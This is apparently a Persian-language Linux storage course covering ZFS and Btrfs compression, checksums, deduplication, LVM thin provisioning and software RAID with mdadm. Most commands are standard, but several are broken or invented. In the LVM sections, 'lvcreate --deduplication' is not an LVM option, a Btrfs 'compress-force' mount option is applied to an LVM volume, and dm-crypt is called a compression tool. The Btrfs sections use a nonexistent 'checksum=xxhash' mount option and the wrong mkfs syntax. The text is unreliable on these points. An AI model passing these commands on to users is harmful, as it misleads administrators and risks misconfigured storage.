۱. انواع روش‌های فشرده‌سازی در سیستم‌های فایل

۱.۱ فشرده‌سازی در سطح فایل‌سیستم

برخی از فایل‌سیستم‌های پیشرفته مانند ZFS و Btrfs به‌صورت داخلی از فشرده‌سازی پشتیبانی می‌کنند و می‌توان آن را برای کل فایل‌سیستم یا بخش خاصی از آن فعال کرد.

۱.۲ فشرده‌سازی در سطح بلاک (Block-level Compression)

در LVM Thin Provisioning و برخی از فایل‌سیستم‌های دیگر، فشرده‌سازی در سطح بلاک انجام می‌شود که باعث کاهش فضای ذخیره‌سازی برای بلاک‌های داده تکراری یا کم‌مصرف می‌شود.

۱.۳ فشرده‌سازی در سطح نرم‌افزار

در برخی موارد، می‌توان از ابزارهایی مانند gzip، bzip2 یا xz برای فشرده‌سازی دستی فایل‌ها و دایرکتوری‌ها استفاده کرد.

---

۲. پیاده‌سازی فشرده‌سازی در ZFS

۲.۱ فعال‌سازی فشرده‌سازی هنگام ایجاد ZFS Pool

برای ایجاد یک ZFS pool با فشرده‌سازی فعال، از دستور زیر استفاده کنید:

zpool create -o ashift=12 -O compression=lz4 mypool mirror /dev/sdb /dev/sdc

در این دستور:

• -O compression=lz4 فشرده‌سازی را با الگوریتم lz4 فعال می‌کند.
• mypool نام ZFS pool است که ایجاد می‌شود.

۲.۲ فعال‌سازی فشرده‌سازی برای یک Dataset خاص

اگر بخواهید فشرده‌سازی را روی یک Dataset خاص فعال کنید، از دستور زیر استفاده کنید:

zfs set compression=lz4 mypool/dataset1

این دستور فشرده‌سازی lz4 را برای mypool/dataset1 فعال می‌کند.

۲.۳ بررسی وضعیت فشرده‌سازی در ZFS

برای مشاهده وضعیت فشرده‌سازی روی ZFS pool می‌توانید از این دستور استفاده کنید:

zfs get compression,compressratio mypool

این دستور نشان می‌دهد که فشرده‌سازی فعال است و نسبت فشرده‌سازی (Compress Ratio) چقدر است.

۲.۴ غیرفعال‌سازی فشرده‌سازی در ZFS

اگر بخواهید فشرده‌سازی را غیرفعال کنید، از دستور زیر استفاده کنید:

zfs set compression=off mypool/dataset1

این دستور فشرده‌سازی را برای Dataset مشخص‌شده غیرفعال می‌کند.

---

۳. پیاده‌سازی فشرده‌سازی در Btrfs

۳.۱ فعال‌سازی فشرده‌سازی هنگام Mount کردن فایل‌سیستم

برای فعال‌سازی فشرده‌سازی روی یک پارتیشن Btrfs، می‌توانید هنگام Mount کردن آن از گزینه compress استفاده کنید:

mount -o compress=zstd /dev/sdb1 /mnt/btrfs_volume

در این دستور، zstd به‌عنوان الگوریتم فشرده‌سازی استفاده می‌شود.

۳.۲ فعال‌سازی فشرده‌سازی برای کل فایل‌سیستم در fstab

برای فعال‌سازی فشرده‌سازی دائمی، باید آن را در فایل /etc/fstab اضافه کنید:

/dev/sdb1 /mnt/btrfs_volume btrfs defaults,compress=zstd 0 0

این تنظیم باعث می‌شود که در هر بار بوت سیستم، فایل‌سیستم با فشرده‌سازی فعال Mount شود.

۳.۳ بررسی وضعیت فشرده‌سازی در Btrfs

برای مشاهده میزان داده‌های فشرده‌شده در Btrfs، از دستور زیر استفاده کنید:

btrfs filesystem df /mnt/btrfs_volume

این دستور نشان می‌دهد که چه مقدار از داده‌های ذخیره‌شده فشرده شده‌اند.

۳.۴ غیرفعال‌سازی فشرده‌سازی در Btrfs

برای غیرفعال کردن فشرده‌سازی هنگام Mount کردن، از این گزینه استفاده کنید:

mount -o compress=no /dev/sdb1 /mnt/btrfs_volume

این دستور فشرده‌سازی را برای پارتیشن غیرفعال می‌کند.

---

۴. پیاده‌سازی فشرده‌سازی در LVM Thin Provisioning

LVM به‌طور مستقیم از فشرده‌سازی پشتیبانی نمی‌کند، اما در صورت استفاده از Thin Provisioning می‌توان از قابلیت‌های فشرده‌سازی درون‌ساخت هسته لینوکس مانند zram و zstd بهره برد.

۴.۱ ایجاد یک Volume Group با Thin Pool

lvcreate --type thin-pool -L 10G -n thinpool vg1

این دستور یک Thin Pool با ظرفیت ۱۰ گیگابایت در Volume Group به نام vg1 ایجاد می‌کند.

۴.۲ ایجاد یک Thin Volume و فعال‌سازی فشرده‌سازی

lvcreate -V5G --thinpool vg1/thinpool -n thinvol1
mount -o compress-force=zstd /dev/vg1/thinvol1 /mnt/thin_volume

در این دستور:

• compress-force=zstd فشرده‌سازی را فعال می‌کند.

۴.۳ بررسی میزان فشرده‌سازی در Thin Volume

df -h /mnt/thin_volume

این دستور نشان می‌دهد که چه مقدار فضای واقعی روی دیسک مصرف شده است.

۴.۴ حذف یک Volume فشرده‌شده

lvremove /dev/vg1/thinvol1

این دستور Thin Volume را حذف می‌کند.

---

۵. جمع‌بندی

• ZFS و Btrfs به‌طور داخلی از فشرده‌سازی پشتیبانی می‌کنند و می‌توان آن را برای کل سیستم فایل یا بخش خاصی از آن فعال کرد.
• ZFS فشرده‌سازی را به‌صورت Transparent انجام می‌دهد و می‌توان آن را برای هر Dataset یا Pool مدیریت کرد.
• Btrfs امکان فشرده‌سازی خودکار دارد و می‌توان آن را در fstab تنظیم کرد.
• LVM مستقیماً از فشرده‌سازی پشتیبانی نمی‌کند، اما می‌توان از Thin Provisioning و فشرده‌سازی در سطح سیستم‌عامل استفاده کرد.
• الگوریتم‌های محبوب برای فشرده‌سازی عبارتند از: lz4، zstd و gzip که هرکدام مزایای خاص خود را دارند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”استفاده از Checksum برای صحت داده‌ها و جلوگیری از بین رفتن اطلاعات” subtitle=”توضیحات کامل”]Checksum یا کد بررسی صحت داده‌ها، مکانیزمی برای تشخیص خطا، خرابی و تغییرات ناخواسته در داده‌ها است. فایل‌سیستم‌های مدرن مانند ZFS و Btrfs از Checksum برای اطمینان از یکپارچگی داده‌ها استفاده می‌کنند. در این بخش، نحوه استفاده از Checksum در ZFS و Btrfs و همچنین ابزارهای بررسی Checksum در لینوکس بررسی خواهد شد.

---

۱. مفهوم Checksum و اهمیت آن در ذخیره‌سازی داده‌ها

۱.۱ چرا Checksum مهم است؟

• تشخیص داده‌های خراب: اگر داده‌ای دچار تغییر یا خرابی شود، Checksum امکان شناسایی آن را فراهم می‌کند.
• جلوگیری از Silent Data Corruption: برخی از خطاهای سخت‌افزاری ممکن است بدون هشدار اتفاق بیفتند، اما Checksum قادر به تشخیص آن‌هاست.
• بهبود قابلیت اطمینان: با استفاده از Checksum، می‌توان داده‌های خراب را از طریق نسخه‌های سالم بازگرداند.

۱.۲ انواع الگوریتم‌های Checksum

• CRC32: سریع ولی با امنیت پایین
• SHA-256: قوی‌تر از CRC32
• Fletcher-4 و Fletcher-64: متداول در ZFS
• BLAKE2b: بسیار سریع و قدرتمند (در ZFS 0.8+ و Btrfs پشتیبانی می‌شود)

---

۲. استفاده از Checksum در ZFS

۲.۱ بررسی وضعیت Checksum در ZFS

ZFS به‌طور پیش‌فرض از Checksum استفاده می‌کند. برای مشاهده وضعیت Checksum روی یک Pool از دستور زیر استفاده کنید:

zfs get checksum mypool

این دستور مقدار Checksum تنظیم‌شده برای Pool mypool را نشان می‌دهد.

۲.۲ تغییر الگوریتم Checksum در ZFS

ZFS از چندین نوع الگوریتم Checksum پشتیبانی می‌کند. برای تغییر آن، از دستور زیر استفاده کنید:

zfs set checksum=sha256 mypool

این دستور Checksum را روی SHA-256 تنظیم می‌کند.

۲.۳ بررسی خطاهای Checksum در ZFS

برای بررسی وجود خطاهای Checksum در Pool، از دستور زیر استفاده کنید:

zpool status -v mypool

این دستور در صورت وجود خطای Checksum، تعداد آن‌ها را نمایش می‌دهد.

۲.۴ تصحیح خودکار داده‌های خراب با Checksum در ZFS

ZFS قابلیت Self-Healing دارد که در صورت وجود خطای Checksum، داده‌ها را از نسخه سالم بازگردانی می‌کند. برای اجرای یک اسکن دستی و اصلاح داده‌های خراب، از دستور زیر استفاده کنید:

zpool scrub mypool

این دستور یک بررسی کامل روی داده‌ها انجام داده و در صورت یافتن خطا، آن‌ها را اصلاح می‌کند.

---

۳. استفاده از Checksum در Btrfs

۳.۱ بررسی وضعیت Checksum در Btrfs

Btrfs به‌طور پیش‌فرض از Checksum برای جلوگیری از خرابی داده‌ها استفاده می‌کند. برای بررسی وضعیت آن، از این دستور استفاده کنید:

btrfs filesystem show /mnt/btrfs_volume

این دستور اطلاعات مربوط به Checksum فایل‌سیستم را نمایش می‌دهد.

۳.۲ فعال‌سازی Checksum هنگام Mount کردن در Btrfs

اگر بخواهید یک الگوریتم خاص Checksum را هنگام Mount کردن فایل‌سیستم استفاده کنید، دستور زیر را اجرا کنید:

mount -o checksum=xxhash /dev/sdb1 /mnt/btrfs_volume

این دستور از الگوریتم Checksum نوع xxhash استفاده می‌کند که سریع و کارآمد است.

۳.۳ تغییر الگوریتم Checksum در Btrfs

برای تغییر الگوریتم Checksum در یک پارتیشن Btrfs، باید فایل‌سیستم را با گزینه -c فرمت کنید:

mkfs.btrfs -O checksum=blake2 /dev/sdb1

این دستور فایل‌سیستم را با الگوریتم BLAKE2 که سریع‌تر از SHA256 است، ایجاد می‌کند.

۳.۴ بررسی و تصحیح خطاهای Checksum در Btrfs

Btrfs امکان بررسی و اصلاح داده‌های خراب را با استفاده از دستور scrub فراهم می‌کند:

btrfs scrub start /mnt/btrfs_volume

این دستور Checksum داده‌ها را بررسی کرده و در صورت یافتن خطای خرابی، آن را اصلاح می‌کند.

برای مشاهده وضعیت اسکن و خطاهای یافت شده:

btrfs scrub status /mnt/btrfs_volume

این دستور گزارش Scrubbing را نمایش می‌دهد.

---

۴. بررسی صحت داده‌ها با Checksum در لینوکس (ابزارهای عمومی)

اگر سیستم‌فایلی که استفاده می‌کنید از Checksum داخلی پشتیبانی نمی‌کند، می‌توان از ابزارهای استاندارد لینوکس برای بررسی صحت داده‌ها استفاده کرد.

۴.۱ بررسی Checksum فایل با md5sum

md5sum myfile.iso

این دستور مقدار MD5 Checksum فایل myfile.iso را تولید می‌کند.

۴.۲ بررسی Checksum فایل با sha256sum

sha256sum myfile.iso

این دستور مقدار Checksum بر پایه SHA-256 را برای فایل تولید می‌کند.

۴.۳ بررسی تمامیت فایل‌ها با sha512sum

sha512sum myfile.iso

این دستور Checksum بر پایه SHA-512 را برای امنیت بیشتر تولید می‌کند.

۴.۴ ذخیره و بررسی Checksum برای فایل‌ها

ابتدا مقدار Checksum را ذخیره کنید:

sha256sum myfile.iso > checksum.sha256

سپس برای بررسی صحت فایل از Checksum ذخیره‌شده استفاده کنید:

sha256sum -c checksum.sha256

اگر فایل تغییری نکرده باشد، پیام OK نمایش داده می‌شود.

---

جمع‌بندی

• ZFS و Btrfs به‌طور پیش‌فرض از Checksum استفاده می‌کنند تا از خرابی داده‌ها جلوگیری کنند.
• ZFS با قابلیت Scrubbing و Self-Healing می‌تواند داده‌های خراب را به‌طور خودکار بازگردانی کند.
• Btrfs از Checksum برای هر بلاک استفاده کرده و قابلیت بررسی و اصلاح داده‌های خراب را دارد.
• ابزارهای عمومی مانند sha256sum و md5sum در لینوکس برای بررسی صحت داده‌های ذخیره‌شده در فایل‌ها به کار می‌روند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”ابزارها و تنظیمات مربوط به Deduplication و Compression در سیستم‌های ذخیره‌سازی مختلف” subtitle=”توضیحات کامل”]Deduplication و Compression دو قابلیت مهم در مدیریت فضای ذخیره‌سازی هستند که در سیستم‌فایل‌های پیشرفته مانند ZFS، Btrfs و LVM پشتیبانی می‌شوند. Deduplication با حذف داده‌های تکراری و Compression با کاهش حجم داده‌ها باعث صرفه‌جویی در فضای ذخیره‌سازی و افزایش عملکرد سیستم می‌شوند. در این بخش، ابزارها و تنظیمات مربوط به این دو ویژگی در سیستم‌فایل‌های مختلف بررسی خواهد شد.

---

۱. Deduplication در سیستم‌های ذخیره‌سازی

Deduplication فرآیندی است که داده‌های تکراری را شناسایی و تنها یک نسخه از آن را ذخیره می‌کند. این فرآیند در دو سطح بلوک (Block-Level) و فایل (File-Level) انجام می‌شود.

۱.۱ Deduplication در ZFS

ZFS یکی از پیشرفته‌ترین سیستم‌فایل‌ها برای Deduplication است که این قابلیت را در سطح بلوک ارائه می‌دهد.

بررسی وضعیت Deduplication در ZFS

zfs get dedup mypool

این دستور مقدار فعلی Deduplication را در ZFS نشان می‌دهد.

فعال‌سازی Deduplication در ZFS

zfs set dedup=on mypool

این دستور Deduplication را برای Pool فعال می‌کند.

غیرفعال‌سازی Deduplication در ZFS

zfs set dedup=off mypool

این دستور Deduplication را غیرفعال می‌کند.

بررسی میزان صرفه‌جویی حاصل از Deduplication در ZFS

zpool list mypool

در این گزارش مقدار DEDUP RATIO نشان می‌دهد که چند برابر فضای صرفه‌جویی شده است.

۱.۲ Deduplication در Btrfs

Btrfs برخلاف ZFS، Deduplication را به‌طور پیش‌فرض پشتیبانی نمی‌کند اما ابزارهایی مانند duperemove و bees برای اجرای آن در دسترس هستند.

نصب duperemove برای Deduplication در Btrfs

apt install duperemove  # Debian/Ubuntu
dnf install duperemove  # Fedora

اجرای Deduplication در یک دایرکتوری خاص

duperemove -dr /mnt/btrfs_volume

این دستور فایل‌های تکراری را شناسایی و Deduplication را اعمال می‌کند.

۱.۳ Deduplication در LVM (Thin Provisioning)

LVM از Deduplication در Thin Volume‌ها پشتیبانی می‌کند. برای فعال‌سازی این قابلیت، باید هنگام ایجاد Volume گزینه --deduplication را تنظیم کرد.

ایجاد یک Thin Volume با Deduplication فعال

lvcreate -L 10G --thinpool --deduplication my_vg/my_thinpool

این دستور یک Thin Pool با قابلیت Deduplication ایجاد می‌کند.

---

۲. Compression در سیستم‌های ذخیره‌سازی

Compression فرآیند کاهش حجم داده‌ها بدون از دست دادن اطلاعات است. این قابلیت به کاهش مصرف فضای ذخیره‌سازی و بهبود عملکرد کمک می‌کند.

۲.۱ Compression در ZFS

ZFS چندین الگوریتم فشرده‌سازی ارائه می‌دهد، از جمله lz4، gzip و zstd.

بررسی وضعیت Compression در ZFS

zfs get compression mypool

این دستور نشان می‌دهد که Compression در حال حاضر فعال است یا خیر.

فعال‌سازی فشرده‌سازی در ZFS با lz4

zfs set compression=lz4 mypool

این دستور فشرده‌سازی را روی Pool تنظیم می‌کند.

فعال‌سازی فشرده‌سازی در ZFS با gzip سطح ۹ (حداکثر فشرده‌سازی)

zfs set compression=gzip-9 mypool

این دستور حداکثر فشرده‌سازی را روی Pool فعال می‌کند.

۲.۲ Compression در Btrfs

Btrfs از الگوریتم‌های zlib، lzo و zstd برای فشرده‌سازی داده‌ها استفاده می‌کند.

فعال‌سازی فشرده‌سازی هنگام Mount کردن Btrfs

mount -o compress=zstd /dev/sdb1 /mnt/btrfs_volume

این دستور فشرده‌سازی را روی zstd تنظیم می‌کند.

تغییر فشرده‌سازی برای یک Subvolume خاص

btrfs property set /mnt/btrfs_volume compress lzo

این دستور فشرده‌سازی را برای Subvolume تغییر می‌دهد.

۲.۳ Compression در LVM (Thin Provisioning)

LVM به‌صورت پیش‌فرض از Compression پشتیبانی نمی‌کند، اما با استفاده از dm-crypt و VDO می‌توان Compression را پیاده‌سازی کرد.

نصب vdo برای فشرده‌سازی در LVM

dnf install vdo

ایجاد Volume با فشرده‌سازی فعال

vdo create --name=my_vdo --device=/dev/sdb --compression

این دستور یک Volume با قابلیت Compression ایجاد می‌کند.

---

۳. مقایسه Deduplication و Compression در سیستم‌فایل‌ها

قابلیت	ZFS	Btrfs	LVM
Deduplication	✅ بومی (نیاز به RAM زیاد)	⭕ از طریق duperemove	✅ در Thin Provisioning
Compression	✅ بومی (lz4, gzip, zstd)	✅ بومی (zlib, lzo, zstd)	⭕ از طریق VDO
Self-Healing	✅ دارد	✅ دارد	❌ ندارد
سرعت پردازش	🔵 متوسط (وابسته به RAM)	🟢 سریع (بهینه برای SSD)	🟡 کند (در Thin Provisioning)

---

جمع‌بندی

• Deduplication باعث کاهش داده‌های تکراری شده و در ZFS به‌صورت داخلی، در Btrfs از طریق duperemove و در LVM با Thin Provisioning قابل اجرا است.
• Compression در ZFS و Btrfs به‌صورت بومی پشتیبانی شده و در LVM می‌توان از VDO استفاده کرد.
• ZFS برای Deduplication و Self-Healing بهترین گزینه است، اما مصرف RAM بالایی دارد.
• Btrfs برای کاربران معمولی که به فشرده‌سازی و ذخیره‌سازی بهینه نیاز دارند، گزینه خوبی است.
• LVM برای پیاده‌سازی Volumeهای مجازی‌شده مناسب است اما امکانات Self-Healing ندارد.

[/cdb_course_lesson][cdb_course_lesson title=”فصل 4. مدیریت RAID”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مدیریت RAID: بررسی انواع پیکربندی، مزایا و معایب” subtitle=”توضیحات کامل”]RAID (Redundant Array of Independent Disks) یک فناوری برای افزایش سرعت، امنیت و قابلیت اطمینان ذخیره‌سازی داده‌ها از طریق ترکیب چندین دیسک سخت است. انواع مختلف RAID، مزایا و معایب خاص خود را دارند که در این بخش بررسی می‌شوند.

---

۱. RAID 0: افزایش عملکرد بدون افزونگی

RAID 0 داده‌ها را به بخش‌های کوچک تقسیم کرده و آن‌ها را بین دو یا چند دیسک توزیع می‌کند. این روش باعث افزایش سرعت خواندن و نوشتن می‌شود اما هیچ افزونگی (Redundancy) ندارد؛ در نتیجه، اگر یکی از دیسک‌ها خراب شود، کل داده‌ها از بین می‌روند.

۱.۱ مزایا و معایب RAID 0

✅ افزایش قابل‌توجه سرعت خواندن و نوشتن
✅ استفاده از تمام ظرفیت دیسک‌ها بدون هدررفت فضا
❌ فاقد افزونگی: خرابی یک دیسک به معنی از دست رفتن تمامی داده‌ها است
❌ نامناسب برای ذخیره داده‌های حیاتی

۱.۲ نحوه پیکربندی RAID 0 در Linux با mdadm

ایجاد RAID 0 با دو دیسک /dev/sdb و /dev/sdc

mdadm --create --verbose /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc

این دستور یک آرایه RAID 0 ایجاد می‌کند.

بررسی وضعیت RAID 0

cat /proc/mdstat

این دستور وضعیت RAID را نمایش می‌دهد.

فرمت و مونت کردن RAID 0

mkfs.ext4 /dev/md0
mount /dev/md0 /mnt/raid0

---

۲. RAID 1: افزونگی داده با همزمان‌سازی (Mirroring)

RAID 1 داده‌ها را به‌طور همزمان روی دو دیسک ذخیره می‌کند (Mirroring)، بنابراین در صورت خرابی یکی از دیسک‌ها، داده‌ها روی دیسک دوم باقی می‌مانند.

۲.۱ مزایا و معایب RAID 1

✅ افزایش قابلیت اطمینان: خرابی یک دیسک باعث از دست رفتن داده‌ها نمی‌شود
✅ خواندن سریع‌تر داده‌ها (با توجه به دو نسخه از داده‌ها)
❌ کاهش ظرفیت قابل استفاده: تنها نیمی از فضای ذخیره‌سازی در دسترس است
❌ بدون افزایش سرعت نوشتن، زیرا داده‌ها به‌طور همزمان روی دو دیسک نوشته می‌شوند

۲.۲ نحوه پیکربندی RAID 1 در Linux با mdadm

ایجاد RAID 1 با دو دیسک /dev/sdb و /dev/sdc

mdadm --create --verbose /dev/md1 --level=1 --raid-devices=2 /dev/sdb /dev/sdc

بررسی وضعیت همگام‌سازی RAID 1

cat /proc/mdstat

این دستور نشان می‌دهد که فرآیند همگام‌سازی (Syncing) در چه مرحله‌ای است.

فرمت و مونت کردن RAID 1

mkfs.ext4 /dev/md1
mount /dev/md1 /mnt/raid1

---

۳. RAID 5: توازن بین سرعت، امنیت و کارایی

RAID 5 از ۳ دیسک یا بیشتر تشکیل شده و از یک الگوریتم Parity برای محافظت از داده‌ها استفاده می‌کند. در صورت خرابی یک دیسک، داده‌های از دست رفته با استفاده از اطلاعات Parity قابل بازیابی هستند.

۳.۱ مزایا و معایب RAID 5

✅ افزایش سرعت خواندن به دلیل توزیع داده‌ها بین چند دیسک
✅ امنیت بالا با تحمل خرابی یک دیسک
✅ استفاده بهینه از فضای ذخیره‌سازی (فقط یک دیسک برای Parity اختصاص می‌یابد)
❌ کاهش سرعت نوشتن به دلیل نیاز به محاسبه Parity
❌ در صورت خرابی بیش از یک دیسک، تمام داده‌ها از بین می‌روند

۳.۲ نحوه پیکربندی RAID 5 در Linux با mdadm

ایجاد RAID 5 با سه دیسک /dev/sdb، /dev/sdc و /dev/sdd

mdadm --create --verbose /dev/md5 --level=5 --raid-devices=3 /dev/sdb /dev/sdc /dev/sdd

بررسی وضعیت RAID 5

cat /proc/mdstat

فرمت و مونت کردن RAID 5

mkfs.ext4 /dev/md5
mount /dev/md5 /mnt/raid5

---

۴. RAID 10: ترکیب سرعت و افزونگی با ترکیب RAID 0 و RAID 1

RAID 10 داده‌ها را به‌صورت Mirroring (RAID 1) و Striping (RAID 0) ذخیره می‌کند، که باعث افزایش همزمان سرعت و امنیت می‌شود. این آرایه حداقل ۴ دیسک نیاز دارد.

۴.۱ مزایا و معایب RAID 10

✅ سرعت بالا به دلیل Striping (افزایش سرعت خواندن و نوشتن)
✅ افزونگی قوی به دلیل Mirroring (تحمل خرابی دیسک‌ها)
❌ نیمی از فضای ذخیره‌سازی قابل استفاده است (به دلیل Mirroring)
❌ هزینه بالا به دلیل نیاز به حداقل ۴ دیسک

۴.۲ نحوه پیکربندی RAID 10 در Linux با mdadm

ایجاد RAID 10 با چهار دیسک /dev/sdb، /dev/sdc، /dev/sdd و /dev/sde

mdadm --create --verbose /dev/md10 --level=10 --raid-devices=4 /dev/sdb /dev/sdc /dev/sdd /dev/sde

بررسی وضعیت RAID 10

cat /proc/mdstat

فرمت و مونت کردن RAID 10

mkfs.ext4 /dev/md10
mount /dev/md10 /mnt/raid10

---

جمع‌بندی

• RAID 0 برای افزایش سرعت ایده‌آل است اما هیچ امنیتی ندارد.
• RAID 1 برای حفظ امنیت داده‌ها مفید است اما فضای ذخیره‌سازی را نصف می‌کند.
• RAID 5 توازنی بین سرعت، ظرفیت و افزونگی دارد، اما عملکرد نوشتن کمی کندتر است.
• RAID 10 بهترین گزینه برای سرعت و امنیت همزمان است، اما به هزینه بیشتری نیاز دارد.

انتخاب بهترین RAID بستگی به نیاز شما دارد؛ اگر فقط سرعت می‌خواهید، RAID 0؛ اگر امنیت مهم است، RAID 1؛ اگر توازن بین سرعت و افزونگی را می‌خواهید، RAID 5 یا RAID 10 بهترین گزینه‌ها هستند.[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مدیریت RAID با mdadm: پیکربندی و استفاده عملی” subtitle=”توضیحات کامل”]mdadm (Multiple Device Administration) ابزار اصلی برای ایجاد، مدیریت و نظارت بر آرایه‌های RAID نرم‌افزاری در لینوکس است. این ابزار به کاربران اجازه می‌دهد که RAID 0، RAID 1، RAID 5، RAID 10 و سایر پیکربندی‌های RAID را پیاده‌سازی کنند.

---

۱. نصب mdadm در سیستم‌عامل‌های مختلف

۱.۱ نصب mdadm در Debian/Ubuntu

apt update
apt install -y mdadm

۱.۲ نصب mdadm در CentOS/RHEL

yum install -y mdadm

۱.۳ نصب mdadm در Arch Linux

pacman -S mdadm

---

۲. ایجاد RAID با mdadm

۲.۱ ایجاد RAID 0 (Striping) برای افزایش سرعت

ایجاد RAID 0 با دو دیسک /dev/sdb و /dev/sdc

mdadm --create --verbose /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc

بررسی وضعیت RAID 0

cat /proc/mdstat

فرمت و مونت کردن RAID 0

mkfs.ext4 /dev/md0
mkdir -p /mnt/raid0
mount /dev/md0 /mnt/raid0

اضافه کردن به /etc/fstab برای ماندگاری در بوت

echo "/dev/md0 /mnt/raid0 ext4 defaults 0 0" >> /etc/fstab

---

۲.۲ ایجاد RAID 1 (Mirroring) برای افزونگی داده‌ها

mdadm --create --verbose /dev/md1 --level=1 --raid-devices=2 /dev/sdb /dev/sdc

فرمت و مونت کردن RAID 1

mkfs.ext4 /dev/md1
mkdir -p /mnt/raid1
mount /dev/md1 /mnt/raid1
echo "/dev/md1 /mnt/raid1 ext4 defaults 0 0" >> /etc/fstab

---

۲.۳ ایجاد RAID 5 با سه دیسک برای تعادل بین سرعت و افزونگی

mdadm --create --verbose /dev/md5 --level=5 --raid-devices=3 /dev/sdb /dev/sdc /dev/sdd

فرمت و مونت کردن RAID 5

mkfs.ext4 /dev/md5
mkdir -p /mnt/raid5
mount /dev/md5 /mnt/raid5
echo "/dev/md5 /mnt/raid5 ext4 defaults 0 0" >> /etc/fstab

---

۲.۴ ایجاد RAID 10 برای ترکیب سرعت و افزونگی

mdadm --create --verbose /dev/md10 --level=10 --raid-devices=4 /dev/sdb /dev/sdc /dev/sdd /dev/sde

فرمت و مونت کردن RAID 10

mkfs.ext4 /dev/md10
mkdir -p /mnt/raid10
mount /dev/md10 /mnt/raid10
echo "/dev/md10 /mnt/raid10 ext4 defaults 0 0" >> /etc/fstab

---

۳. بررسی و نظارت بر RAID

۳.۱ بررسی وضعیت RAID

cat /proc/mdstat
mdadm --detail /dev/md0

۳.۲ مشاهده وضعیت دیسک‌های RAID

mdadm --query /dev/md0

---

۴. اضافه کردن یک دیسک جدید به RAID

۴.۱ اضافه کردن دیسک به RAID 1 (Mirror) پس از خرابی

mdadm --add /dev/md1 /dev/sdd

۴.۲ اضافه کردن دیسک به RAID 5

mdadm --add /dev/md5 /dev/sde

۴.۳ بررسی فرآیند همگام‌سازی (Resyncing)

cat /proc/mdstat

---

۵. حذف دیسک از RAID و جایگزینی آن

۵.۱ حذف یک دیسک خراب از RAID 1

mdadm --fail /dev/md1 /dev/sdb
mdadm --remove /dev/md1 /dev/sdb

۵.۲ جایگزینی دیسک در RAID 1

mdadm --add /dev/md1 /dev/sdf

---

۶. حذف یک آرایه RAID و بازگردانی دیسک‌ها

۶.۱ توقف RAID

umount /mnt/raid1
mdadm --stop /dev/md1

۶.۲ حذف RAID و پاک کردن سوپر بلاک (Superblock)

mdadm --zero-superblock /dev/sdb /dev/sdc

۶.۳ حذف RAID از /etc/mdadm/mdadm.conf

nano /etc/mdadm/mdadm.conf
# خط مربوط به RAID موردنظر را حذف کنید

---

۷. ذخیره و بازیابی تنظیمات RAID

۷.۱ ذخیره تنظیمات RAID در mdadm.conf

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

۷.۲ بازیابی RAID در هنگام بوت

mdadm --assemble --scan

---

جمع‌بندی

• mdadm ابزار اصلی مدیریت RAID نرم‌افزاری در لینوکس است و می‌تواند انواع RAID را ایجاد، بررسی و مدیریت کند.
• RAID 0 برای افزایش سرعت، RAID 1 برای افزونگی، RAID 5 برای تعادل و RAID 10 برای سرعت و امنیت بهینه استفاده می‌شوند.
• نظارت و مدیریت دیسک‌ها در RAID بسیار مهم است تا از خرابی داده جلوگیری شود.
• پس از ایجاد RAID، اضافه کردن آن به /etc/fstab برای ماندگاری در بوت ضروری است.
• RAIDهای ایجادشده با mdadm می‌توانند به‌صورت خودکار مونت شوند و در هنگام بوت سیستم بازیابی گردند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نصب و پیکربندی RAID با mdadm در لینوکس” subtitle=”توضیحات کامل”]RAID یک روش برای ترکیب چندین دیسک فیزیکی در یک واحد ذخیره‌سازی مجازی است که مزایای افزایش سرعت، افزونگی و بهینه‌سازی ظرفیت را به همراه دارد. mdadm ابزار اصلی برای ایجاد، مدیریت و نظارت بر آرایه‌های RAID نرم‌افزاری در لینوکس است.

---

۱. نصب mdadm در سیستم‌های مختلف

۱.۱ نصب در Debian و Ubuntu

apt update
apt install -y mdadm

۱.۲ نصب در CentOS و RHEL

yum install -y mdadm

۱.۳ نصب در Arch Linux

pacman -S mdadm

---

۲. بررسی وضعیت دیسک‌ها قبل از پیکربندی RAID

۲.۱ نمایش لیست دیسک‌های موجود

lsblk
fdisk -l

۲.۲ مشاهده پارتیشن‌های دیسک‌ها

blkid

---

۳. ایجاد پارتیشن‌های مخصوص RAID

۳.۱ ایجاد پارتیشن برای RAID با fdisk

fdisk /dev/sdb

• گزینه n را برای ایجاد پارتیشن جدید انتخاب کنید.
• گزینه p را برای پارتیشن Primary انتخاب کنید.
• شماره پارتیشن (مثلاً 1) را وارد کنید.
• مقدار پیش‌فرض First sector و Last sector را برای استفاده از کل فضای دیسک انتخاب کنید.
• نوع پارتیشن را با t و کد fd (Linux RAID autodetect) تنظیم کنید.
• پارتیشن را با w ذخیره کنید.

۳.۲ بررسی پارتیشن ایجاد‌شده

lsblk -o NAME,FSTYPE,SIZE,TYPE,MOUNTPOINT

۳.۳ اعمال تغییرات بدون ری‌استارت

partprobe

---

۴. ایجاد انواع RAID با mdadm

۴.۱ ایجاد RAID 0 (Striping) برای افزایش سرعت

mdadm --create --verbose /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc

۴.۲ ایجاد RAID 1 (Mirroring) برای افزونگی داده‌ها

mdadm --create --verbose /dev/md1 --level=1 --raid-devices=2 /dev/sdb /dev/sdc

۴.۳ ایجاد RAID 5 با سه دیسک برای تعادل بین سرعت و افزونگی

mdadm --create --verbose /dev/md5 --level=5 --raid-devices=3 /dev/sdb /dev/sdc /dev/sdd

۴.۴ ایجاد RAID 10 برای ترکیب سرعت و افزونگی

mdadm --create --verbose /dev/md10 --level=10 --raid-devices=4 /dev/sdb /dev/sdc /dev/sdd /dev/sde

---

۵. بررسی وضعیت RAID و همگام‌سازی داده‌ها

۵.۱ نمایش وضعیت RAID

cat /proc/mdstat

۵.۲ مشاهده جزئیات RAID

mdadm --detail /dev/md0

---

۶. فرمت و مونت کردن RAID

۶.۱ فرمت کردن RAID با ext4

mkfs.ext4 /dev/md0

۶.۲ ایجاد دایرکتوری و مونت کردن RAID

mkdir -p /mnt/raid0
mount /dev/md0 /mnt/raid0

